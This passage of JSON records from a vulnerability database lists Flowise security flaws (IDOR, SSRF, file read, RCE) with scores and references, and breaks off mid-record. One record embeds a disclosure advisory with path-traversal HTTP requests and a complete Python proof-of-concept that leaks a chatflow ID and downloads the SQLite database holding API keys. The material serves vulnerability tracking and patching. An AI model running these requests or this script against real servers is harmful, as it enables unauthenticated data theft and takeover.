            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an insecure direct object reference (IDOR) vulnerability that leads to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30823",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09992",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30823"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30823",
                    "reference_id": "CVE-2026-30823",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30823"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
                    "reference_id": "flowise%403.0.13",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cwc3-p92j-g7qm",
                    "reference_id": "GHSA-cwc3-p92j-g7qm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cwc3-p92j-g7qm"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm",
                    "reference_id": "GHSA-cwc3-p92j-g7qm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "CVE-2026-30823",
                "GHSA-cwc3-p92j-g7qm"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m3j3-4u39-euht"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/100879?format=api",
            "vulnerability_id": "VCID-n77p-4nu7-2yb4",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, a Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. This issue has been patched in version 3.0.6.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59527",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00218",
                            "scoring_system": "epss",
                            "scoring_elements": "0.4445",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59527"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59527",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59527"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6",
                    "reference_id": "flowise%403.0.6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hr92-4q35-4j3m",
                    "reference_id": "GHSA-hr92-4q35-4j3m",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-hr92-4q35-4j3m"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m",
                    "reference_id": "GHSA-hr92-4q35-4j3m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hr92-4q35-4j3m"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24",
                    "reference_id": "index.ts#L6-L24",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/fetch-links/index.ts#L6-L24"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18",
                    "reference_id": "index.ts#L8-L18",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/fetch-links/index.ts#L8-L18"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478",
                    "reference_id": "utils.ts#L474-L478",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-22T20:25:46Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/src/utils.ts#L474-L478"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "CVE-2025-59527",
                "GHSA-hr92-4q35-4j3m"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n77p-4nu7-2yb4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360553?format=api",
            "vulnerability_id": "VCID-pg5c-6y4s-h3cq",
            "summary": "Flowise has an Arbitrary File Read\n### Summary\nAn arbitrary file read vulnerability in the `chatId` parameter supplied to both the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints allows unauthenticated users to read unintended files on the local filesystem. In the default Flowise configuration this allows reading of the local sqlite db and subsequent compromise of all database content.\n\n### Details\nBoth the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints accept the `chatId` parameter and pass this to a subsequent call to streamStorageFile().\n\n\n```\nconst chatflowId = req.query.chatflowId as string\nconst chatId = req.query.chatId as string\nconst fileName = req.query.fileName as string\n\n...\n const fileStream = await streamStorageFile(chatflowId, chatId, fileName, orgId)\n```\n\nWhile streamStorageFile validates that the chatflowId is a UUID and strips traversal sequences from fileName, it performs no validation of chatId.\n\n\n```\n    // Validate chatflowId\n    if (!chatflowId || !isValidUUID(chatflowId)) {\n        throw new Error('Invalid chatflowId format - must be a valid UUID')\n    }\n\n    // Check for path traversal attempts\n    if (isPathTraversal(chatflowId)) {\n        throw new Error('Invalid path characters detected in chatflowId')\n    }\n...\n    const sanitizedFilename = sanitize(fileName)\n...\n\tconst filePath = path.join(getStoragePath(), orgId, chatflowId, chatId, sanitizedFilename)\n```\n\nThere is validation that the resulting filePath is restricted to the `/root/.flowise/storage` directory.\n\n```\nif (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)\n```\n\nHowever, if the file is not found in the specified path, the orgId value is removed from the filePath and reattempted.\n\n```\n        if (fs.existsSync(filePath)) {\n            return fs.createReadStream(filePath)\n        } else {\n            // 
Fallback: Check if file exists without orgId\n            const fallbackPath = path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename)\n\n            if (fs.existsSync(fallbackPath)) {\n                // Create directory if it doesn't exist\n                const dir = path.dirname(filePath)\n                if (!fs.existsSync(dir)) {\n                    fs.mkdirSync(dir, { recursive: true })\n                }\n\n                // Copy file to correct location with orgId\n                fs.copyFileSync(fallbackPath, filePath)\n\n                // Delete the old file\n                fs.unlinkSync(fallbackPath)\n\n                // Clean up empty directories recursively\n                _cleanEmptyLocalFolders(path.join(getStoragePath(), chatflowId, chatId))\n\n                return fs.createReadStream(filePath)\n\n```\n\nAs this fallback path is read after the `/root/.flowise/storage` check, this allows an additional level of traversal up to `/root/.flowise/`. As a result, this  allows reading of `/root/.flowise/database.sqlite`, which contains all database content in the default Flowise configuration.\n\nREQUEST\n```\nGET /api/v1/get-upload-file?chatflowId=188903b1-d06d-4f93-9415-400015b87146&chatId=../.././&fileName=database.sqlite HTTP/1.1\nHost: 127.0.0.1:3000\n\n```\n\nRESPONSE\n```\nHTTP/1.1 200 OK\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Disposition: attachment; filename=\"database.sqlite\"\nDate: Tue, 22 Jul 2025 06:43:51 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 385024\n\nSQLite format 3�\u0010�\u0001\u0001�@  
���6���^���A���\u0015���Õ���\u0004�����������\u0001�����������������������������������6�.r¢\u0005\u000fö�\u0006\u000fÚ����Z\u000fû\u000fì\u000fñ\u000fæ\u000fà\u000fÚ\u000fÛ\t\u000e\b�\u0007Ï\u0001l\u0007–\u0007\n\u0005Í\u0005‚\u0004\u0004S\u0003=\u0004*\u0001'\u0001'���������������������������������������������������������������������������������������������������������������������������������������������;,\u0006\u0017O)\u0001�indexsqlite_autoindex_docume\n...\n```\n\nSimilarly, for `/api/v1/openai-assistants-file/download`:\nREQUEST\n```\nPOST /api/v1/openai-assistants-file/download HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nContent-Length: 100\n\n{\"chatflowId\":\"c5c63474-e757-4fca-a504-d54e84c309bb\",\"chatId\":\"/../..\",\"fileName\":\"database.sqlite\"}\n```\nRESPONSE\n```\nHTTP/1.1 200 OK\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Disposition: attachment; filename=\"database.sqlite\"\nDate: Tue, 22 Jul 2025 08:55:25 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\nContent-Length: 385024\n\nSQLite format 3�\u0010�\u0001\u0001�@  ���6���^���A���\u0015���Õ���\u0004�����������\u0001�����������������������������������6�.r¢\u0005\u000fö�\u0006\u000fÚ����Z\u000fû\u000fì\u000fñ\u000fæ\u000fà\u000fÚ\u000fÛ\t\n...\n```\n\nThis includes all API keys used by the application (apiKey table), which can be used to gain administrative access.\n\nAs the fallback logic attempts to move the file to the initially checked directory, this results in the server permanently being unable to make new read or write operations until the file is moved and the server is restarted.\n\nInteraction with these endpoints requires knowledge of a valid `chatflowId`. As a UUID, this is inherently unguessable. However, the `/api/v1/vector/upsert/` endpoint can be used without a chatflowId, defaulting to the first ID available. 
This endpoint returns a verbose error when receiving a malformed filename, revealing the full internal file path and the associated `chatflowId`.\n\n\nREQUEST\n```\nPOST /api/v1/vector/upsert/ HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Length: 172\nConnection: keep-alive\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"files\"; filename=\"?\"\nContent-Type: text/plain\n\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n```\nRESPONSE\n```\nHTTP/1.1 500 Internal Server Error\nVary: Origin\nAccess-Control-Allow-Credentials: true\nContent-Type: application/json; charset=utf-8\nContent-Length: 240\nETag: W/\"f0-khSyqlT3NYLMJGjdchTl6Iwqe4U\"\nDate: Tue, 22 Jul 2025 08:14:20 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\n\n{\"statusCode\":500,\"success\":false,\"message\":\"Error: vectorsService.upsertVector - EISDIR: illegal operation on a directory, open '/root/.flowise/storage/07b5d2bd-9b5c-4de3-b234-4fe4357051c9/188903b1-d06d-4f93-9415-400015b87146'\",\"stack\":{}}\n```\nIn this case the UUID is revealed as `188903b1-d06d-4f93-9415-400015b87146`, which can then be used to exploit the file read vulnerability.\n\n### PoC\n\nRun Flowise:\n```\ndocker run --rm  -p 3000:3000 flowiseai/flowise\n```\nComplete install & create a Chatflow:\n<img width=\"575\" height=\"299\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1a34e809-b9b3-48a1-93b4-8dafccf87e3b\" />\n\nSave this script to `read.py`:\n```\nimport argparse\nimport re\nimport requests\n\ndef read_file(url, file_path, proxy):\n    base_url = url\n    proxies = {'http': proxy, 'https': proxy} if proxy else None\n\n    print(f\">> starting exploit against {base_url}\")\n    if proxy:\n        print(f\">> using proxy: {proxy}\")\n\n    try:\n        print(\"[*] step 1: leaking chatflowid\")\n        initial_headers = {}\n        files = {'files': ('?', 'asdf', 'text/plain')}\n        response 
= requests.post(f\"{base_url}/api/v1/vector/upsert/\", files=files, headers=initial_headers, timeout=10, proxies=proxies)\n        chatflow_id_matches = re.findall(r'([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})', response.json().get(\"message\", \"\"))\n        if len(chatflow_id_matches) < 2:\n            print(\"[-] failed to leak chatflowid.\")\n            return\n        chatflow_id = chatflow_id_matches[1]\n        print(f\"[+] got chatflowid: {chatflow_id}\")\n\n        print(f\"[*] step 2: reading file: {file_path}\")\n        internal_headers = {'x-request-from': 'internal'}\n        params = {'chatflowId': chatflow_id, 'chatId': '/../../', 'fileName': file_path}\n        response = requests.get(f\"{base_url}/api/v1/get-upload-file\", params=params, headers=internal_headers, timeout=10, proxies=proxies)\n        \n        if response.status_code != 200:\n            print(f\"[-] failed to read file (status: {response.status_code}).\")\n            print(response.text)\n            return\n        \n        file_content = response.text\n        print(f\"[+] successfully read file ({len(response.content)} bytes).\")\n        print(\"\\n--- file content ---\")\n        print(file_content)\n        print(\"--------------------\\n\")\n\n    except requests.exceptions.RequestException as e:\n        print(f\"\\n[-] an unexpected error occurred: {e}\")\n    except Exception as e:\n        print(f\"\\n[-] an unexpected error occurred: {e}\")\n        return\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Read arbitrary files\")\n    parser.add_argument(\"-u\", \"--url\", type=str, required=True, help=\"target base url (e.g., http://127.0.0.1:3000)\")\n    parser.add_argument(\"-f\", \"--file\", type=str, required=True, help=\"path of the file to read on the server (e.g., database.sqlite)\")\n    parser.add_argument(\"-x\", \"--proxy\", type=str, help=\"proxy to use (e.g., http://127.0.0.1:8080)\")\n\n    args = 
parser.parse_args()\n    read_file(args.url, args.file, args.proxy)\n```\n\nRun the script against `http://127.0.0.1:3000`:\n```\npython3 read.py -u http://127.0.0.1:3000 -f database.sqlite\n>> starting exploit against http://127.0.0.1:3000\n[*] step 1: leaking chatflowid\n[+] got chatflowid: c5c63474-e757-4fca-a504-d54e84c309bb\n[*] step 2: reading file: database.sqlite\n[+] successfully read file (385024 bytes).\n\n--- file content ---\nÕÇêS=*'';,O)indexsqlite_autoindex...\n\n```\n\n\n### Impact\n\nThis allows any unauthenticated user to extract all database content from a default installation of Flowise. This includes API keys, which can be used to gain administrative access.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-99pg-hqvx-r4gf",
                    "reference_id": "GHSA-99pg-hqvx-r4gf",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-99pg-hqvx-r4gf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "GHSA-99pg-hqvx-r4gf"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pg5c-6y4s-h3cq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81102?format=api",
            "vulnerability_id": "VCID-pzza-9xq9-a7de",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass that uses the FILE-STORAGE:: keyword combined with NODE_OPTIONS environment variable injection. This allows execution of arbitrary system commands with root privileges inside the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41268",
